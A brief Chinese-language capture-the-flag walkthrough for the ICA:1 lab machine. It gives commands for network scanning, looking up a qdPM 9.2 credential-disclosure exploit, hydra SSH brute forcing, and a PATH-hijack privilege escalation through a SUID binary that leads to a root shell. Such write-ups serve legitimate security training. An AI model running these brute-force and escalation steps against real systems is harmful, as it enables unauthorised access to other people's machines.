ICA:1靶场
ICA:1靶场
机器信息:
靶机:192.168.142.129
攻击机:192.168.142.132
一、主机发现
arp-scan -l
或者
nmap -sP 192.168.142.0/24
二、端口扫描
nmap -sV -p- 192.168.142.129
或者
nmap -A -p- 192.168.142.129
三、渗透提权阶段
(1)查询框架漏洞:
searchsploit qdpm 9.2
(2)找到对应文件:
locate php/webapps/50176.txt
或者
find / -name 50176.txt
(3)通过50176.txt中的方法找到了数据库用户名和密码
(4)登录数据库查询用户信息
(5)用数据库拿到的信息进行ssh爆破
hydra -L user.txt -P password.txt ssh://192.168.142.129
(6)确定用户账号和密码,ssh进行登录
(7)得到提示,找查可执行文件
find / -perm -u=s 2>/dev/null
(8)通过strings查看文件中的字符
strings /opt/get_access
(9)发现存在setuid、system、cat /root/system.info等字眼
(10)修改环境变量来提权
vim /tmp/cat
echo "/bin/bash" > /tmp/cat
chmod +x /tmp/cat
export PATH=/tmp:$PATH
echo $PATH
(11)执行文件,成功提权
/opt/get_access
(12)提权后删除/tmp/cat文件
(13)到/root目录下拿到flag
参考资料:
https://www.cnblogs.com/sainet/p/15656589.html